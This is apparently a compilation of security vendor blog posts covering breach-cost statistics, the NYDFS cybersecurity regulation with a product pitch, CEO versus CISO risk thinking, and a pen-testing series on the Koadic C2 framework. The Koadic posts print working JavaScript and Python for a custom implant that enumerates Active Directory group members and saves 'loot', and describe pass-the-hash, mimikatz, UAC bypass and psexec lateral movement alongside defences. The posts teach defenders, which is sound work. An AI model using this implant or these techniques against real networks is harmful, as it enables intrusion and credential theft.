This number may be eyebrow-raising to CISOs and CEOs of our hypothetical healthcare company. We are dealing with heavy-tailed data, and while this company may not have experienced a $4 million incident average (yet), the average tells them how bad it can get. And that can help guide C-levels in deciding how much to spend on security risk mitigation — software, training, etc.

With two parameters, alpha and beta, you can go into the breach cost prediction business.

To go a little deeper, I used stats software — thank you, EasyFit! — for some curve wrangling. I picked a power-law distribution, known as Pareto-2, to fit the data.

Though there are comfier fits with other heavy-tail distributions in the software, it turns out that this one is a very good approximation for the tail, which is really what we’re interested in. And as we’ll soon see, this function will help us say more precisely how bad it can get.

Towards Value at Risk (VaR)

I just took you on a speedy tour through the first level of the FAIR approach. The average number we came up with, known in the trade as AAL (average annual loss), is a good baseline for understanding cyber risks.

As I suggested above, the CEO and (especially) the CFO want more precise information. This leads to Value at Risk or VaR, a biz-school formula that financiers and bankers use in their risk estimates.

If you’ve ever taken, as I have, “statistics for poets”, you’ll immediately recognize VaR as the 90% or 95% confidence formula for normal curves. Typically, CFOs prefer measuring the 99% level — about 2.3 standard deviations from the mean — or the “once in a hundred years” event.

Why?

They are planning for extreme situations! You can think of CFOs grappling with how much to set aside to deal with the equivalent of a cyber tornado or hurricane, and for this, VaR is well suited.

Using my stats software, I came up with a 90% VaR — a once-in-ten-years event — for my non-normal, heavy-tailed distribution: it works out to $8.2 million, which is close to the actual HIPAA data at the 10% mark in the graph above. Good work, EasyFit!
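
If you don’t have EasyFit handy, scipy can do the same curve wrangling. Here’s a sketch; since the HIPAA dataset isn’t reproduced in this post, it fits synthetic stand-in costs:

import numpy as np
from scipy import stats

rng = np.random.default_rng(1)
costs = 3e6 * rng.pareto(2.0, 300)  # synthetic stand-in for per-incident breach costs

alpha, loc, beta = stats.lomax.fit(costs, floc=0)  # Pareto-2 is scipy's "lomax"
var90 = stats.lomax.ppf(0.90, alpha, loc=loc, scale=beta)  # the 90% single-event VaR
print(f"alpha={alpha:.2f}, beta=${beta / 1e6:.1f}M, 90% VaR=${var90 / 1e6:.1f}M")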

The advantage of having a VaR formula, which I’ll go into more detail next time, is that it enables us to extrapolate: we can answer other questions beyond what the data tells us.

For example: what can I expect in breach costs over a 10-year period assuming an average of, say, three cyber events in that period? I won’t hold you in suspense … the 90% VaR formula tells us it’s about $19 million, under 3 times the single-event VaR of $8.2 million.

Let’s call it a day.

I’ll go over some of this material again, and tie it all up into a nice package in my next post. And we’ll learn more scary details about evil heavy-tailed breach loss curves.


NYDFS Cybersecurity Regulation in Plain English

In 2017, the New York State Department of Financial Services (NYDFS) launched a GDPR-like cybersecurity regulation for the state’s massive financial industry. Unusually for the state level, the regulation includes strict requirements for breach reporting and limiting data retention.

Like the GDPR, the New York regulation has rules for basic principles of data security, risk assessments, documentation of security policies, and designating a chief information security officer (CISO) to be responsible for the program.

Unlike the GDPR, the regulation has very specific data security controls, including annual pen testing and vulnerability scans!

The point of these rules, as with the GDPR, is to protect sensitive nonpublic information — essentially consumer personally identifiable information (PII) that can be used to identify an individual.

NYDFS Cybersecurity Regulation Defined

The NYDFS Cybersecurity Regulation (23 NYCRR 500) is “designed to promote the protection of customer information as well as the information technology systems of regulated entities”. This regulation requires each company to conduct a risk assessment and then implement a program with security controls for detecting and responding to cyber events.

Who Does the NYDFS Cybersecurity Law Apply To?

The NYDFS has supervisory power over banks, insurance companies, and other financial service companies. More specifically, they supervise the following covered entities:

  • Credit Unions
  • Health Insurers
  • Investment Companies
  • Licensed Lenders
  • Life Insurance Companies
  • Mortgage Brokers
  • Savings and Loans Associations
  • Private Bankers
  • Offices of Foreign Banks
  • Commercial Banks

In short: any institution that needs a license from the NYDFS is covered by this regulation. A more extensive list can be found here.

There are some exemptions for companies that fall under the following categories:

  • Fewer than 10 employees, including any independent contractors, of the Covered Entity or its Affiliates located in New York or responsible for business of the Covered Entity, or
  • Less than $5,000,000 in gross annual revenue in each of the last three fiscal years from New York business operations of the Covered Entity and its Affiliates, or
  • Less than $10,000,000 in year-end total assets, calculated in accordance with generally accepted accounting principles, including assets of all Affiliates, or
  • There’s no storing or processing of nonpublic information.

How Does The NYDFS Cybersecurity Regulation Work?

The NYDFS Cybersecurity Regulation works by enforcing what are really common-sense IT security practices. Financial companies in New York that already rely on existing standards, say PCI DSS or SANS CSC 20, should have little problem meeting the New York regulation.

In short, NYDFS is asking organizations to assess their security risks, and then develop policies for data governance, classification, access controls, system monitoring, and incident response and recovery. The regulation calls for companies to implement, at a minimum, specific controls in these areas (see the next section) that are typically part of compliance standards.

The big difference, of course, is that New York State regulators at the Department of Financial Services are enforcing these rules, so not complying with the regulation becomes a legal matter. They even require covered entities to designate a CISO who will annually sign off on the organization’s compliance.

What Are The NYDFS Regulation Requirements?

Covered entities will have to implement the following:

  • Risk Assessments – Conducted periodically and used to assess the “confidentiality, integrity, security and availability” of the IT infrastructure and PII. (Section 500.09)
  • Audit Trail – Designed to record and respond to cybersecurity events. The records will have to be maintained for five years. (Section 500.06)
  • Limitations on Data Retention – Develop policies and procedures for the “secure disposal” of PII that is “no longer necessary for business operations or for other legitimate business purposes” (Section 500.13)
  • Access Privileges – Limit access privileges to PII and periodically review those privileges. (Section 500.07)
  • Incident Response Plan – Develop a written plan to document internal processes for responding to cybersecurity events, including communication plans, roles and responsibilities, and necessary remediations of controls as needed. (Section 500.16)
  • Notices to Superintendent – Notify the NYDFS within at most 72 hours after a “material” cybersecurity event has been detected. (Section 500.17)

NYDFS Cybersecurity FAQs

    1. Do you have to report all cybersecurity events within 72-hours to NYDFS?
      No. You only have to report events that have a “reasonable likelihood of materially harming any material part” of the company’s IT infrastructure. For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.
    2. How frequently do you have to conduct risk assessments?
      Covered entities are supposed to conduct “periodic” assessments. However, keep in mind that CISOs will have to certify annually (see below) that their organization is in compliance. You should expect to do assessments at a minimum once per year.
    3. How much documentation is required beyond developing security policies?
      There’s no escaping the fact that reporting requirements are significant, and CISOs will be busy just handling this new regulation. In addition to reporting material cyber incidents to NYDFS, the CISOs will have to report annually to the board or governing body the current cybersecurity state of the organization, including material cybersecurity risks, effectiveness of controls, and material cybersecurity events. For any weaknesses that are discovered as part of the assessment, CISOs will need to document the remediation efforts that were undertaken. Finally, the CISO will also have to annually certify to the NYDFS that their organization is in compliance.

NYDFS Cybersecurity Regulation Tips for Compliance

There are a few important points to keep in mind about the NYDFS regulation:

  • NYSDFS rules on breach reporting cover a far broader set of cyber events than any other state’s. Not only does the organization have to report stolen information, but also any attempt to gain access to, disrupt, or misuse a system. This includes denial-of-service (DoS), ransomware, and any kind of post-exploitation where system tools are leveraged and misused. Look for monitoring systems that have the capability to detect unusual access to sensitive data.
  • There are significant training requirements for cyber staff. Companies will have to provide corporate training to “address relevant cybersecurity risks”. And cyber staff are not off the hook either: they are required to take steps to keep professionally current with cybersecurity trends. Financial companies in New York will likely need to up their training budgets to meet these rules.
  • Data classification is a critical first step in performing a risk assessment. A security team will need to determine how much PII is in the organization, where it is located, and who has access to it in order to evaluate potential risk. This information is then used to tune access rights to this sensitive data so that only those who really need data as part of their role have access — and no one else.

How Varonis Can Help

  • Section 500.02 Cybersecurity Program – Varonis detects insider threats and cyberattacks by analyzing data, account activity, and user behavior; prevents and limits disaster by locking down sensitive and stale data; and efficiently sustains a secure state with automation.
  • Section 500.06 Audit Trail – Varonis gives you a single unified platform to manage risk and protect your most important assets, along with built-in reports and a detailed, searchable audit trail of data access. With a unified audit trail, admins or security analysts are only a few clicks away from knowing who’s been opening, creating, deleting, or modifying important files, sites, Azure Active Directory objects, emails, and more.
  • Section 500.07 Access Privileges – DatAdvantage maps who can access data and who does access data across file and email systems, shows where users have too much access, and then safely automates changes to access control lists and security groups. DataPrivilege gives business users the power to review and manage permissions, groups, and access certification, while automatically enforcing business rules. The Automation Engine discovers undetected security gaps and automatically repairs them: fixing hidden security vulnerabilities like inconsistent ACLs and global access to sensitive data.
  • Section 500.09 Risk Assessment – Varonis Risk Assessments provide a comprehensive report that highlights at-risk sensitive data, flags access control issues, and quantifies risk. The risk assessment summarizes key findings, exposes data vulnerabilities, provides a detailed explanation of each finding, and includes prioritized remediation recommendations.
  • Section 500.13 Limitations on Data Retention – Data Transport Engine automatically moves, archives, quarantines, or deletes data based on content type, age, access activity, and more. Migrate data cross-domain or cross-platform, all while keeping permissions intact and even making them better. Quarantine sensitive and regulated content, discover data to collect for legal hold, identify data to archive and delete, and optimize your existing platforms.
  • Section 500.14 Training and Monitoring – Varonis continually monitors and alerts on your core data and systems. Detect unusual file and email activity, suspicious user behavior, and trigger alerts cross-platform to protect your data before it’s too late. Automatic response triggers can stop ransomware in its tracks, and mitigate the impact of compromised accounts and potential data breaches. Visualize security threats with an intuitive dashboard, investigate security incidents – even track alerts and assign them to team members for closure.
  • Section 500.16 Incident Response Plan.
  • Section 500.17 Notices to Superintendent.

NYDFS dictates that risk assessments are not just a good idea, but (at least in New York State) are required for financial companies. Get started with a free risk assessment: we’ll identify PII, flag excessive permissions, and help you prioritize at-risk areas – and take the first steps towards meeting NYDFS compliance.

Koadic: Security Defense in the Age of LoL Malware, Part IV

One of the advantages of examining the gears inside Koadic is that you gain low-level knowledge into how real-world attacks are accomplished. Pen testing tools allow you to explore how hackers move around or pivot once inside a victim’s system, and help you gain insights into effective defensive measures.

Block that Hash Passing

Pass the Hash (PtH) is one approach, though not the only one, for moving beyond the initial entry point in the targeted system. It’s received lots of attention, so it’s worth looking at more closely.

The key assumption behind PtH is that you already have local administrative privileges, which are required by mimikatz and other hash passers. Koadic conveniently provides mimikatz in one of its implants.

Is getting admin privileges for PtH an issue for hackers?

Generally not! The hackeratti have found that obtaining local admin privileges is not a major barrier. They’ve been able to take advantage of special exploits, guess default Administrator passwords, or get lucky and land on an account that already has higher privileges.

Koadic, for example, includes a few implants that can raise privilege levels. The one I tried is based on Matt Nelson’s work involving the auto-elevation capabilities of the Windows binary eventvwr.exe, which is, somewhat ironically, the Windows Event Viewer. Anyway, Microsoft has since come out with a patch for this exploit in Windows 10.

At one point during my initial testing over the summer, Koadic’s bypassuac_eventvwr implant seemed to work on my Amazon instance. In my last test, it failed, and I’ll assume I got lucky with an unpatched system in my first go-around.

There’s a lesson here: in the wild, not every system is going to be patched, and hackers will hunt around until they find one!

UAC Helps!

Microsoft has written a long and comprehensive white paper on preventing PtH. It’s worth your time to scan through it. However, there’s also been much written by security wonks on what Microsoft has done (or not done) in preventing PtH. And after reading more in-depth analysis, I’m not sure I understand all the subtleties!

In any case, one of Microsoft’s recommendations is User Account Control, UAC for short, a security control added back in Vista. It prevents privileged accounts from automatically doing whatever they want until their actions are approved (on a secure console) by a human. You may have seen the UAC dialog show up on your office laptop when you try to download and execute a binary from the Intertoobz.

You can find the UAC settings in Group Policy Objects under Policies\Windows Settings\Local Policies\Security Options (below). The MS honchos recommend, at a minimum, enabling Admin Approval Mode. In my testing, I got carried away and liberally enabled a few other UAC options.

With UAC enabled, I was able to stop Koadic from running its mimikatz implant.

I set up a scenario where the Koadic stager is launched directly from a local Administrator account. Even in this obvious case, you eventually have to deal with UAC. You can still run commands remotely from the Koadic console, but if you try to engage in a PtH pivot, you’re blocked (below). I checked the event log, and sure enough there’s an entry showing that UAC was activated.

Blocked by UAC!

In short: UAC prevents hackers from getting to domain-level credentials and easily hopping from one computer to another.

The Horror of Local Administrator Accounts

One of the root enablers of lateral movement is the local Administrator account that once upon a time Windows set up automatically. To make life easier, IT admins have often configured these accounts with the same easily guessable password across many machines.

For hackers, that’s like throwing gasoline on the fire: once in, they can effortlessly navigate around the victim’s system without even needing PtH. They just run psexec, supplying it explicitly with the Administrator’s password, say admin123. Easy peasy.

There’s another bad practice of giving some users — often executives — local Administrator privileges on the mistaken belief that they need these extra privileges for special tasks. In other words, their user accounts are added to the local Administrators group on their laptops.

Lucky hackers who land on one of these machines can hit the ground running: they already have elevated permissions, so they can PtH from the get-go.

What are some ideas for lessening the risks with local accounts?

The aforementioned PtH white paper suggests removing ordinary domain users from the local Administrators group. A good idea, and I approve of this message.

If you do keep local Administrator accounts, then make sure they have high-entropy passwords. It can be a major headache to go back and update bad admin passwords for larger sites. Microsoft generously provides Local Administrator Password Solution (LAPS) and Restricted Groups to allow companies to centrally manage these accounts. It’s a topic I took up in this post.

You could then follow this up by preventing local accounts from logging in remotely. There’s a GPO setting under Policies\Windows Settings\Local Policies\User Rights Assignment called “Deny access to this computer from the network”. By configuring it with a local SID, as explained here, you should be able to block any local account from networking.

[Updated]

So even if hackers have gained a privileged local account, we can stop them from moving around with this GPO setting. I’ve not tried this particularly efficient way of stomping out PtH, but I’ll update this post as soon as I give it a test ride.

I did get a chance to try this recent patch, which makes it incredibly convenient to disable local Administrator accounts from networking at the domain level by providing this new SID, “NT AUTHORITY\Local account and member of Administrators group”. You just need to enter this loooong string into the deny networking GPO setting:

Stop local admin networking now! There’s a separate GPO, by the way, for disabling remote desktopping.

This is not necessarily a bad idea. Yes, you’ve prevented hackers from networking with, say, psexec, if they happen to guess the local Administrator password correctly. But you’ve probably also inconvenienced some admins, and made them more than a little angry, along the way.

If you don’t want to inconvenience your own team, and assuming they have good, hard-to-guess passwords, there’s another possibility. But therein lies a tale, which is covered in this extensive post by the awesome Will “harmj0y” Schroeder. To turn off the token passing that allows the PtH attack to succeed, you have to deal with two regedit settings found under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (below).
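Based on harmj0y’s write-up, the two values in question are LocalAccountTokenFilterPolicy and FilterAdministratorToken. Here’s a quick Python sketch that reads them; the interpretation in the comments is my paraphrase, so double-check it against his post:

import winreg

KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# LocalAccountTokenFilterPolicy = 0 (the default) strips the admin token
# from remote logons by local accounts -- that's what breaks PtH.
# FilterAdministratorToken = 1 extends the filtering to the built-in
# RID-500 Administrator account.
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
    for name in ("LocalAccountTokenFilterPolicy", "FilterAdministratorToken"):
        try:
            value, _ = winreg.QueryValueEx(key, name)
            print(name + " = " + str(value))
        except FileNotFoundError:
            print(name + " not set (default applies)")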

With these two regedit settings, you can turn off PtHing. It will stop hackers from dumping admin credentials and re-using them on another machine.

After some trial and error, I think I finally got what harmj0y was saying. In short, you can allow admins to network with their high-entropy, hard-to-guess passwords while stopping hackers from PtHing. I’ll talk more about this in another post.

Closing Thoughts on LoL Defense

Keeping hackers contained on a single machine is a practical way to reduce risk. Sure, they’re inside and can still do some reconnaissance, but at least you’ve limited the damage.

Koadic shows how hackers can use existing Windows binaries — mshta, rundll32 — to download scripts. But you can turn off this remote script loading capability, and shut down the attack from the start, with Windows Firewall! There’s no reason these binaries should be accessing the Internet, and Firewall lets you disable their outbound connections.
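If you’d rather script those rules than click through the Firewall console, here’s one way it might look, driving netsh from Python. The rule names are my own invention, and you’ll want to test for side effects (rundll32 especially) before rolling this out:

import subprocess

# Block outbound traffic for the script-running binaries Koadic leans on.
# Run from an elevated prompt; test before deploying widely.
for exe in ("mshta.exe", "rundll32.exe", "regsvr32.exe"):
    subprocess.run(
        ["netsh", "advfirewall", "firewall", "add", "rule",
         "name=Block outbound " + exe,
         "dir=out", "action=block",
         "program=C:\\Windows\\System32\\" + exe],
        check=True)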

Finally, Windows 10 will, no doubt, lead us all into a more secure future. Its Windows Defender has powerful malware detection capabilities, and Credential Guard seems to have a more comprehensive solution to dealing with hashes and Kerberos tickets. I’ll take this up in a future post.

CEO vs. CISO Mindsets, Part II: Breach Risk, Security Investment, and Thinking Like an MBA

CEO vs. CISO Mindsets, Part II: Breach Risk, Security Investment, and Thinking Like an MBA

In the last post, I brought up the cultural differences between CEOs and CISOs. One group is managing and growing the business, using spreadsheets to game-plan various money-making scenarios. The other is keeping the IT infrastructure going 24/7, studying network diagrams while tweaking PowerShell scripts. I think you know which is which.

The point of this series is to bridge the divide between these two tribes. In this post, I’ll be dispensing advice on how CISOs and CIOs can begin to convince their overlords — CFOs and CEOs — to pay for data security software. And the first step is to get a better understanding of how CEOs do their work.

Instant MBA for CISOs

The cultural problem begins at business school. No doubt there are more than a few CISOs and CIOs with MBAs, but most of them are too busy learning about the latest pen testing techniques or studying for their next IT certification.

However, I can save CISOs two years of study and hundreds of thousands of dollars in tuition. I’ve taken a brief tour of a typical MBA syllabus and can boldly say that everything you need to know about higher-business thinking can be distilled into a simple example.

Let’s say, as they do in a typical B-school assignment, you have $500,000 to invest. If you put it all in a savings account, you can earn a risk-free 1% per year, or $5,000. Or you can take stakes in tech startups at $10,000 a pop. In this example, each startup has a 1 in 20, or 5%, chance of cashing in at a later round of financing to the tune of $400,000.

Which option is better?

MBA students learn about such higher concepts as the law of large numbers, and they effortlessly calculate the average return on the above investment. They know that in the long run they’ll come out ahead with the startup investments, and that in the short run they’ll have to deal with the cruel winds of Fortune (and gambler’s ruin).

So with 50 investments in startups, you have a 72% chance of landing two or more startup victories and cashing out for at least $800,000. On the other hand, about 28% of the time you’ll end up with one win or none, and fail to recoup your $500,000 stake. But the payouts will ultimately cover the losses and give a profit to boot — an expected payout of $1 million, for a profit of $500,000.
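Here’s a quick sanity check on those numbers, a minimal Python sketch using the binomial distribution (the figures are the ones from the example above):

import math

n, p = 50, 0.05                   # 50 startup bets, 5% chance each pays off
payoff, stake = 400_000, 500_000

def binom_pmf(k):
    # Probability of exactly k wins out of n bets
    return math.comb(n, k) * p**k * (1 - p)**(n - k)

p_one_or_fewer = binom_pmf(0) + binom_pmf(1)
print(f"P(two or more wins): {1 - p_one_or_fewer:.0%}")     # ~72%
print(f"P(one win or fewer): {p_one_or_fewer:.0%}")         # ~28%

expected_payout = n * p * payoff
print(f"Expected payout: ${expected_payout:,.0f}")          # $1,000,000
print(f"Expected profit: ${expected_payout - stake:,.0f}")  # $500,000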

What does this have to do with convincing executives to invest in data protection software?

Let’s say the CEO has a spreadsheet — trust me, she does! — showing revenues and costs projected over the next few years. Of course, she’s assigned various weights or probabilities to different scenarios and calculated an average payout for each.

Here’s the bad news for CIOs and CISOs. While the standard IT reports, charts, and statistics are essential to understanding the company’s current security status, they are not useful in themselves to CEOs. You’d get a “so what?” if you showed them a graph of the number of bots probing ports on an hourly basis.

In justifying an investment in new data security software, a CEO wants to know how data security software will bend or shape the projections in the spreadsheets.

To convince the other C-levels and/or the board of directors, the CISO will have to prove that a breach, with some non-trivial probability, can occur that will cause a significant loss involving legal costs, regulatory fines, class action suits, and customer churn. And then explain how the proposed security software will ultimately pay for itself by protecting against these breaches, thereby keeping the business plans on track.
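To make that concrete, here’s a toy version of the pitch in Python. Every number below is hypothetical, purely to show the shape of the argument:

# All figures are made up for illustration.
annual_breach_prob = 0.10   # chance of a breach in a given year
breach_cost = 4_200_000     # average cost of an incident
software_cost = 150_000     # annual cost of the security software
risk_reduction = 0.50       # fraction of breach risk the software removes

loss_before = annual_breach_prob * breach_cost
loss_after = annual_breach_prob * (1 - risk_reduction) * breach_cost
print(f"Expected annual loss, unprotected: ${loss_before:,.0f}")  # $420,000
print(f"Expected annual loss, protected: ${loss_after:,.0f}")     # $210,000
print(f"Net annual benefit: ${loss_before - loss_after - software_cost:,.0f}")  # $60,000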

Data Breaches and Risk

This is not a unique problem in business decision making. Some of the ideas and support tools I’ll be discussing below may be new to CIOs, but they can be learned and applied easily by anyone who’s done even the simplest model building.

First, let me give a shout out to the Cyentia Institute and a gold star to the FAIR Institute. You can noodle on these things on your own, as I did, but it helps that FAIR has a systematic methodology to arrive at an analysis that any CEO would be happy to hear out.

For the naysayers who think this is all guesswork and mathiness, there are more real-world datasets available than you might at first think, and the methodologies I’ll be discussing are more accurate than being guided by intuition alone.

FAIR’s approach forces you to delve into two areas: the magnitude or cost of a data breach incident, and the frequency at which these attacks arise. From that you can come up with a reasonable estimate of the average cost of dealing with breaches over a given time period.

Let’s take up the first part, the cost of a breach. Actually, this is not a single number! It’s really a distribution of percentages — say, 10% of breach incidents cost less than $10,000, 15% are $30,000 or less, etc. This distribution of losses goes under the fancy name of exceedance or excess loss probabilities. In the real world, insurance companies produce these distribution curves to work out auto or home policies for their risk pools.

Can you work out an exceedance probability for your own situation?

You may have to do some digging and perhaps basic model building. However, for healthcare breaches in particular, we have an embarrassment of riches thanks to HIPAA!

I was able to take the last two years of HIPAA breach report data and calculate losses based on Jay Jacobs’s breach cost regression formula. The loss distribution comes from ranking the costs from smallest to largest and calculating the percentages. My approach is not quite a true excess loss curve, but we’ll take that up next time.

Loss distribution based on about 300 data points from 2016 – 2018. (Source: HIPAA)

It’s worthwhile to ponder the above, and note how the incidents cluster at the base while the tail has fewer but more enormous incidents: in the tens of millions, with one weighing in at over $100 million. I’m smelling a fat tail!

As a sanity check for my dataset, I calculated the average cost of a health incident to be around $4.2 million. This is in the ballpark of Ponemon’s incident cost numbers — you can check the 2018 report for yourself. I can do more analysis of this curve, but let’s give ourselves a break.
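If you’d like to try the ranking approach on your own incident data, here’s a minimal Python sketch. The loss figures below are made-up stand-ins, not the HIPAA numbers:

# Hypothetical incident costs, sorted smallest to largest
losses = sorted([8_000, 25_000, 60_000, 150_000, 400_000,
                 900_000, 2_500_000, 15_000_000, 110_000_000])

n = len(losses)
for rank, loss in enumerate(losses):
    # Fraction of incidents costing at least this much
    print(f"P(loss >= ${loss:,}) = {(n - rank) / n:.0%}")

print(f"Average incident cost: ${sum(losses) / n:,.0f}")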

In short, if you’re a hospital or insurer and are hit with a breach, there’s a small chance you’ll really get whomped!

This is exactly the kind of information a hospital CEO would want to know! However, to derive a more practical answer, you’ll need to guesstimate the chances of your organization getting breached in the first place.

We’ll go over some of this again next time, and then try to work out a more complete argument to make to CEOs and boards to support buying data protection software.

If you want a homework assignment, review Evan Wheeler’s informative and strangely calming RSA presentations on cyber risk management. It’s a big subject with lots of variables and unknowns, but Evan breaks the problem into more digestible portions using the FAIR methodology. Bravo, Evan!


Koadic: Implants and Pen Testing Wisdom, Part III

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver JavaScript malware implants to the target and then interact with them from the comfort of your console.

Sure, there’s a learning curve to understanding how the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python shell (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you need to code up these two parts. And that’s all you need to know. Well, not quite: I’ll get into more details below.
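Concretely, a new implant ends up as a matched pair of files. The file names below are mine (you’ll meet enum_adusers shortly); the directories are Koadic’s own:

implant/modules/enum_adusers.py    # C2 side: console command, options, output handling
implant/data/enum_adusers.js       # target side: the JavaScript that actually runs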

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant that lists the AD members of a given group. It seemed like something I could do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never coded the JavaScript to access Active Directory, you’ll find oodles of online examples on how to set up a connection to a data source using the ADODB object — for example this tutorial. The trickiest part is fine tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

// Connect to Active Directory through the ADSI OLE DB provider
objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider = "ADsDSOObject";
objConnection.Open("Active Directory Provider");
objCommand = new ActiveXObject("ADODB.Command");
objCommand.ActiveConnection = objConnection;  // the command needs the open connection

Koadic.work.report("Gathering users ...");

// ADSI query string: base ; filter ; attributes ; scope
// Koadic replaces ~GROUP~ with the info field; strDomain is set
// by the surrounding implant code.
strDom = "<LDAP://" + strDomain + ">";
strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users," + strDomain + "))";
strAttributes = "ADsPath";

strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText = strQuery;

objRecordSet = objCommand.Execute();

// Walk the result set, collecting each user's ADsPath
objRecordSet.MoveFirst();
user_str = "";
while (!objRecordSet.EOF) {
  user_str += objRecordSet.Fields("ADsPath").value;
  user_str += "\n";
  objRecordSet.MoveNext();
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted an existing Koadic implant; I’m calling mine enum_adusers. You can view a part of my implant below.

import core.implant
import core.job   # the Job base class lives in its own module
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()

    def display(self):
        # Show at most 10 lines on the console; save the full
        # results to a loot file when the group is large.
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            save_file = "/tmp/loot." + self.session.ip + "." + uuid.uuid4().hex
            with open(save_file, "w") as f:
                f.write(self.data)
            self.shell.print_good("Saved loot list to " + save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class, in particular the print methods. Under the hood, Koadic is scooping up the data sent by the JavaScript code’s report function, and displaying it to the console.

By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this partly to inspire you to roll your own implants, but also to make another point. The underlying techniques that Koadic relies on — rundll32 and mshta — have been known to hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses.

Let’s just say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny thing happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this: “Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling, you’ll learn that Windows’ Internet security controls have a special setting that allows browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure this was disabled for my server instance, which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant to pull in AD users.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy product for letting you leverage HTML for internal business apps.

The real pen testing wisdom I gained is that if this particular script runs, it means the remote data source setting is enabled, and that is not a good thing, even, and perhaps especially, on a server.
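You can audit for this, too. The setting lives in the browser zone keys of the registry. Below is a sketch assuming the standard layout, where zone 3 is the Internet zone and action value 1406 is “Access data sources across domains” (0 = enable, 1 = prompt, 3 = disable); note that machine-wide policy can also live under HKLM:

import winreg

# Zone 3 = Internet; value 1406 = "Access data sources across domains"
KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY) as key:
    value, _ = winreg.QueryValueEx(key, "1406")
    meaning = {0: "enabled -- the hole my implant needed!",
               1: "prompt",
               3: "disabled (the safe default)"}
    print("Access data sources across domains: " + meaning.get(value, str(value)))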

Next time, I’ll be wrapping up this series, and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.


Master Fileless Malware Penetration Testing!

Master Fileless Malware Penetration Testing!

Our five-part series brings you up to speed on stealthy techniques used by hackers. Learn how to sneakily run scripts with mshta, rundll32, and regsvr32, scary Windows binaries that live in your System32 folder!


CEO vs. CISO Data Security Mindsets, Part I

CEO vs. CISO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks, Wade — behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap and try to get everyone on the same page. (And after that I’ll take on world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CISO and board subjects to rate the value of cybersecurity to their business in five categories: security guidance, business enabler, loss avoidance, data protection, and brand protection (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated as valuable by under 30% of CISOs but over 80% of board members. Maybe I’m a crazy idealist, but you’d think that would be job #1 for CISOs!

